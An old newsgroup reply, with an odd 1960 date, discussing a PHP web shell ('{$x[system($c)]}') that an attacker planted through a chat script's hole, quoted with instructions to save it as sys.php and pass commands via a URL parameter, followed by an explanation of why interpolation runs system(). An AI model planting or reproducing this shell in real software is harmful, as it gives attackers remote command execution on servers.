|
|
Posted by Sandman on 12/08/60 11:57
In article <1157450070.312008.144490@m79g2000cwm.googlegroups.com>,
"Oski" <oski@gmx.de> wrote:
> Hello,
>
> our server got hacked through a security hole in an open source php
> chat script.
> (nothing new so far, ok!)
>
> This chat script allowed the user to create a new php script on our
> server, with the following content: (the code between the two "..."
> from the hacker):
>
> <?
> $name = "{$x[system($c)]}";
> // some more lines ommitted ...
> ?>
>
> save these lines as e.g. /sys.php and call it with your browser:
> http://localhost/sys.php?c=ls
> and you can execute any system command and see the results!
>
> But: How does it work? The content of a variable being executed and
> written to the browser?
> If it were just "system($c)" then I understood.
Well, it's odd. system() returns the last line of output if
successful. But in this case, $name is set to the value of $x where
the key is the last line of the ouput. Is there any $x declaration in
the script?
For instance, this:
<?
$x["var"] = "foobar";
$c = "ls";
$name = "{$x[system($c)]}";
print "Value: $name";
?>
Outpus, after a long list of directories in my root directorie (where
'var' is the last):
Value: foobar
So, "var" is the last directory in the ls listing. And the value of
$x["var"] is "foobar", which is assigned to $name.
Why? I have no idea. I'd have top see the entire script for that.
--
Sandman[.net]
Navigation:
[Reply to this message]
|